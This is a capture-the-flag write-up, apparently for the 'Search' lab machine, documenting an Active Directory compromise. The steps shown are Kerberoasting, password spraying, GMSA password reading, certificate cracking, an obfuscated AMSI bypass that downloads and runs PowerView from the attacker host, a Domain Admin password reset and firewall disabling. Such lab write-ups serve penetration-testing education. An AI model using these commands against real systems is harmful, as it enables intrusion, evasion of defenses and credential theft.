# Search ## Nmap ``` sudo nmap 10.10.11.129 -p- -sS -sV PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 80/tcp open http Microsoft IIS httpd 10.0 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-07-05 18:32:36Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name) 443/tcp open ssl/http Microsoft IIS httpd 10.0 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name) 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name) 3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name) 8172/tcp open ssl/http Microsoft IIS httpd 10.0 9389/tcp open mc-nmf .NET Message Framing 49667/tcp open msrpc Microsoft Windows RPC 49675/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49676/tcp open msrpc Microsoft Windows RPC 49702/tcp open msrpc Microsoft Windows RPC 49716/tcp open msrpc Microsoft Windows RPC 49736/tcp open msrpc Microsoft Windows RPC Service Info: Host: RESEARCH; OS: Windows; CPE: cpe:/o:microsoft:windows ``` ### Kerbrute Starting out we hit some valid usernames whe running kerbrute against the target system. I was unable to proceed with the found usernames so we move onto enumerating the web server. ``` kerbrute userenum '/usr/share/seclists/Usernames/xato-net-10-million-usernames.txt' --dc 10.10.11.129 --domain search.htb ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FN1U9oB4Jb5Cr8UPDOmEV%2Fimage.png?alt=media\&token=5e971fd4-d9af-461e-ac6a-9b71078a497d) Basic reconnaissance against the web server shows some team members who may have valid accounts within Active Directory. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FSDfi3bTi7yWk75yzqyJc%2Fimage.png?alt=media\&token=d362a499-f67a-4c55-a3d7-761ff55a9577) The potential users have been listed below. ``` Keely Lyons Dax Santiago Sierra Frye Kyla Stewart Kaiara Spencer Dave Simpson Ben Thompson Chris Stewart ``` As we are not aware of the naming convention used for Active Directory user accounts we need to generate a list of possible combinations. ### Username Generation Username generation can be completed with usernamer. usernamer will take an input list of usernames and generate combinations based on likely naming convetions **URL:** ``` python2 usernamer.py -f usernames -l >> usernames_AD.txt ``` After generating the usernames we can the new list with kerbrute against. Revealing the naming convention of *Firstname.Surname*. ``` kerbrute userenum ~/Desktop/usernames_AD.txt --dc '10.10.11.129' --domain 'search.htb' ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2F3aWgw5AweId1sOaOGiwx%2Fimage.png?alt=media\&token=a211e5f7-f7a3-48de-8fc9-f4edb1149302) However, after multiple brute force attempts I was unable to proceed. ### Information within images After some time we head back over to the web server and after some time, we find one of the displayed images contains credential information for a internal user. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FfdeFa24iNLhlttRmwcMa%2Fimage.png?alt=media\&token=da12657d-518d-42ba-8b1a-781661740da9) Keywords identified are "Hope Sharp" and "IsolationIsKey?". Considering we know the naming context for this Domain we try the potential credentials with `crackmapexec`. ``` crackmapexec smb '10.10.11.129' -u hope.sharp -p 'IsolationIsKey?' -d 'search.htb' ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2F4nWH0nWLniDk65bipIz4%2Fimage.png?alt=media\&token=49936d8f-bf8b-46b0-995d-82261f7763fa) ### Service Prinicipal Names With valid credentials we check for SPN's using Impacket `GetUserSPNs.py` and pull a krb5tgs hash for the user *web\_svc*. ``` GetUserSPNs.py search.htb/hope.sharp:'IsolationIsKey?' -dc-ip '10.10.11.129' -request ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2F4c4RYxEhHXuhNcgTK9XZ%2Fimage.png?alt=media\&token=22b9ea9d-eefd-443e-99a4-811a57e12a3d) Using hashcat on mode 13100 we are able to soon crack the hash with the `rockyou.txt` wordlist. ``` hashcat -a 0 -m 13100 hash.hash /usr/share/wordlists/rockyou.txt ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FovNhliyMVHZ0ZgRWhJYw%2Fimage.png?alt=media\&token=08efefd0-1ee2-47a1-b8af-b1f4cf963b1b) Credentials:`web_svc:@3ONEmillionbaby` ### Password Spraying I tested for some timed with the web\_svc account and was unable to progress anywhere meaningful. Spraying the password against all known uses (who have been enumerated with valid credentials) we get a hit for *edgar.jacobs*. ``` crackmapexec smb '10.10.11.129' -u ~/Desktop/users -p '@3ONEmillionbaby' --continue-on-success ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2F8pY0WJUgaMZZWEATqgCM%2Fimage.png?alt=media\&token=d0799e70-b869-47e4-b3bf-7bd0ff559ab8) Credentials: `edgar.jacobs:@3ONEmillionbaby` ### Protected Worksheets Using these credentials against SMB with smbmap we recursively lists all available shares. ``` smbmap -H '10.10.11.129' -u 'edgar.jacobs' -p '@3ONEmillionbaby' -d 'search.htb' -R ``` Where under Edgar's Desktop redirected folders we see "Phishing\_Attempt.xlsx". ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fy3K5HEdyL76wVbn35lca%2Fimage.png?alt=media\&token=ad52c5cc-3c29-412a-8e96-c67728062e1a) Using smbmap we download the file of interest. ``` smbmap -H '10.10.11.129' -u 'edgar.jacobs' -p '@3ONEmillionbaby' -d 'search.htb' -R -A xlsx ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FvjmRHbOsvCKz4ULpDX3u%2Fimage.png?alt=media\&token=64b1b920-ef26-48ac-a3ce-36e8f7da320b) Opening the Phishing\_attempt.xlsx file we see under the worksheet "passwords" that column "C" is missing. As well as the worksheet being password protected. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FqGzmCxfK3KF3pU4AzhIM%2F2022-07-14%2012_24_34-10.10.11.129-RedirectedFolders_edgar.jacobs_Desktop_Phishing_Attempt.xlsx%20-%20Exce.png?alt=media\&token=e7558f5e-d238-40f9-aa20-65519eecd2c6) Some research shows there is various ways of removing the worksheet protection when the password is not known: ``[`https://www.ablebits.com/office-addins-blog/protect-unprotect-excel-sheet-password/#unlock-excel-spreadsheet-vba`](https://www.ablebits.com/office-addins-blog/protect-unprotect-excel-sheet-password/#unlock-excel-spreadsheet-vba)`` I opted for the copy and paste method where you highlight all cells and simply paste into a net worksheet. Revealing passwords as shown below. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FbauQSY0Bkp8eXgl6ntvl%2F2022-07-14%2012_26_02-10.10.11.129-RedirectedFolders_edgar.jacobs_Desktop_Phishing_Attempt.xlsx%20-%20Exce.png?alt=media\&token=c890b142-a9d2-42b5-988c-8184c8e8f361) ### Password Spraying #2 Spraying the password list against the list of known users we get a hit for Sierra.Frye. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2F81ByXKUsJEzli5MKXqZr%2Fimage.png?alt=media\&token=57821ec6-36d7-461b-aabf-c6e10e2e3edc) Credentials: ``` sierra.frye:$$49=wide=STRAIGHT=jordan=28$$18 ``` ### Bloodhound With valid credentials we can perform BloodHound enumeration externally with Bloodhound.py **GitHub:** ``` python3 bloodhound.py -u 'sierra.frye' -p '$$49=wide=STRAIGHT=jordan=28$$18' -ns '10.10.11.129' -d 'search.htb' ``` After completing the BloodHound enumeration the results are uploaded to the console and reviewed. We see we are a member of the "Remote Management Users". ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FrvokK80RPOr3p3RGPEaE%2Fimage.png?alt=media\&token=03e1de30-c2a7-47f4-bc37-fba89a2f72e0) No luck, WinRM is not running externally on the target system. ### GMSAPassword ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FKI9C6eo2mr5WxEdlFU8w%2Fimage.png?alt=media\&token=01b75fc8-6942-4ea4-8e6b-7b0e802a3905) Further enumeration shows effective members of the group *ITSEC* have the ability to read the GMSA password of *BIR-ADFS-GMSA*. gMSADUmper is a python script that can be utilized to read the msDS-ManagedPassword \*\*\*\* attribute and decrypt with the **msDS-ManagedPasswordID** attribute. **gMSADumper:** ``` python3 gMSADumper.py -u 'sierra.frye' -p '$$49=wide=STRAIGHT=jordan=28$$18' -d search.htb -l 10.10.11.129 ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fi5sZoipYGs5kZPclqoRd%2Fimage.png?alt=media\&token=46d24da8-9351-4b77-ab0f-d9f7f18506b4) After successfully reading and decrypting the GMSA password we are left with the following credentials: `BIR-ADFS-GMSA$:::e1e9fd9e46d0d747e1595167eedcec0f` However, from here I was unable to proceed with the credentials. ### Certificates Going back to further enumeration we use `smbmap` to list available shares using Sierra's credentials and find some certificate files within the redirected folders share. ``` smbmap -H '10.10.11.129' -u 'sierra.frye' -p '$$49=wide=STRAIGHT=jordan=28$$18' -d 'search.htb' -R -A "p12" smbmap -H '10.10.11.129' -u 'sierra.frye' -p '$$49=wide=STRAIGHT=jordan=28$$18' -d 'search.htb' -R -A "pfx" ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FL9z5RieyyHlWF13bGuJ5%2Fimage.png?alt=media\&token=656772f3-f50b-47f0-a45c-a6a7de726e53) After downloading we are prompted for a password on the `.pfx` file. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fa1pZ7K0ETjaTm7BngLE7%2Fimage.png?alt=media\&token=0d27f182-3dd5-4e58-aba9-183131dec48c) `pfx2john` is used to convert the file to a hash usable by `john`. ``` /usr/bin/pfx2john ~/10.10.11.129-RedirectedFolders_sierra.frye_Downloads_Backups_staff.pfx >> pfxhash.hash ``` Cracking the hash: ``` sudo john --wordlist=/usr/share/wordlists/rockyou.txt pfxhash.hash ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fv8BPDZymypigMgt5haGM%2Fimage.png?alt=media\&token=d15f3a9a-6238-4afe-ada2-9258cbbaba72) We can now import the certificate file into Firefox. A password will be prompted to complete the action where we provide the same password shown above. ### PowerShell Web Access Moving over to the `/staff` web page we are given the opportunity to provide the certificate file. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fn5wjYva5v8NVIkZICIM6%2Fimage.png?alt=media\&token=d9f9a62b-ccee-442e-a804-4fe63592ef23) We are then progressed a PowerShell web access console. Logging in with Sierra's credentials and the computer name as "research" allows logon. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FjbwVvxz355moLoLeQ2cD%2Fimage.png?alt=media\&token=b56d96a8-77d2-475d-bf4a-16e4b35ca80b) ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FiBoKhxZXV7BeHmt5xfgc%2Fimage.png?alt=media\&token=5f15b7be-1e91-4584-aec2-71d333ecab27) ### User.txt We are then able to grab the `user.txt` flag. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fs2vDeAiyBfXRApyxIPcW%2Fimage.png?alt=media\&token=cb2f8d5d-0bf9-4cac-a960-ff253ff914d1) ### Lateral Movement with PowerShell I was unable to find a method of privilege escalation as Sierra and BloodHound was not providing any paths for potential escalation. I decided to proceed with gaining command execution as *BIR-ADFS-GMSA$* using PowerShell remoting. Even though we already have the credentials for `BIR-ADFS-GMSA$` I used the following PowerShell snippet linked below to build a credential variable from the GMSA read ability for use with `Invoke-Command`. **URL:** ``` $cred = new-object system.management.automation.PSCredential "search.htb\BIR-ADFS-GMSA",(ConvertFrom-ADManagedPasswordBlob $mp).SecureCurrentPassword Invoke-Command -ComputerName $env:computername -Credential $cred -ScriptBlock {whoami} ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FtVPimyD66eymZjJjNQRI%2Fimage.png?alt=media\&token=22bf91fe-5113-443e-a602-5225fc49025d) ### Invoke-ACLScanner Whilst working as BIR-ADFS-GMSA$ I then bypassed AMSI and run Powerview's Invoke-ACL Scanner to look for ACL's of interest. ``` Invoke-Command -computername research -Credential $cred -ScriptBlock {S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} ); iex (iwr -usebasicparsing http://10.10.14.8:8000/powerview.ps1);Invoke-ACLScanner -ResolveGUIDs | out-file c:\redirectedfolders\Output.txt } ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FOhTHmHBmglJzNdbCTMwm%2Fimage.png?alt=media\&token=5900bb9e-b972-42f4-8edd-0dc62fecb4ab) Looking through the results we see that `BIR-ADFS-GMSA$` has GenericAll privileges over the user Tristan.Davies wo is a Domain Administrator. Weird how this attack path was not picked up by BloodHound. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FgXiiAvHMSIumESi3ffcN%2Fimage.png?alt=media\&token=55cca38a-f432-4e5f-86a3-76091a3aec7e) As we have GenericAll over Tristan.Davies we can change the user's password. ``` Invoke-Command -computername research -Credential $cred -ScriptBlock {net user /domain tristan.davies Password123} ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2F4ydVYYrVGOTw484Glcyr%2Fimage.png?alt=media\&token=ab0da5cc-cc1d-4894-8099-428286f0a4b6) To gain full shell access I disabled the firewall with our now acquired Domain Administrator account. ``` crackmapexec smb '10.10.11.129' -u 'Tristan.Davies' -p 'Password123' -d 'search.htb' -x 'netsh advfirewall set allprofiles state off' ``` Check the WSMAN is running with `Nmap`. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FlcDej7WsGhV0zCfkY84h%2Fimage.png?alt=media\&token=19d0818a-15f3-45b2-9efb-a72c0717ffd4) ### root.txt Then proceeded to login with `Evil-WinRM`. ``` evil-winrm -i '10.10.11.129' -u 'Tristan.Davies' -p 'Password123' ``` Then grabbed the `root.txt` flag. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Ft29a6xeVVGuJiqIQ1AxU%2Fimage.png?alt=media\&token=38d7a2b5-7416-4b82-b923-c1f499d4895c)